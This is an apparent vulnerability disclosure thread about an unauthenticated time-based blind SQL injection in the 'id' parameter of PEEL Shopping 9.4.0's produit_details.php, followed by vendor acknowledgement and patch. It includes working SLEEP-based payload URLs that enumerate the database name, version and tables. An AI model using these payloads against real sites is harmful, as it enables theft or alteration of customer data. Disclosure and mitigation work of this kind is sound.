SQL Injection in "produit_details.php?id" parameter (Unauthenticated)

[faisalfs10x]

Vulnerability Name: SQL Injection in "_produitdetails.php?id" parameter

Date of Discovery: 10 July 2021

Product version: 9.4.0 . Download link

Author: faisalfs10x

Vulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "_/peel-shopping_9_4_0/achat/produitdetails.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.

Vulnerable URL: _http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]_

Proof of Concept:

1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)

[PoC enum db name]

2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)

[Poc enum MariaDB]

3) By default, the database have a table name = peel_produits. This query will check if table_name _peelproduits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)

[PoC enum table peel_produits]

To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like BurpSuite (repeater).

Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)

1. [MariaDB disclosed image]

2. [peel_produits table_name disclosed]

Dump table name = peel_profil

Consequences:

• Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
• Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack.

Mitigation: Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id']) cc @advisto

References for Mitigation Vulnerability: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

[advisto]

Thanks.

This was due to a change of structure to get product details, in order to potentially link it to a product API instead of reading data from MySQL. The previously done protection was no more active, thus it was necessary to add an intval on the GET parameter.

=> Subject closed

[faisalfs10x]

So, i noticed you made code changes on this line right. file _produitdetails.php . But, the bug is still affected on version 9.3.0 anyway.

[advisto]

The version which can be downloaded on our website is now patched

[faisalfs10x]

That's great. Thanks for acknowledge the vulnerability.

[advisto]

Thanks for your remarks.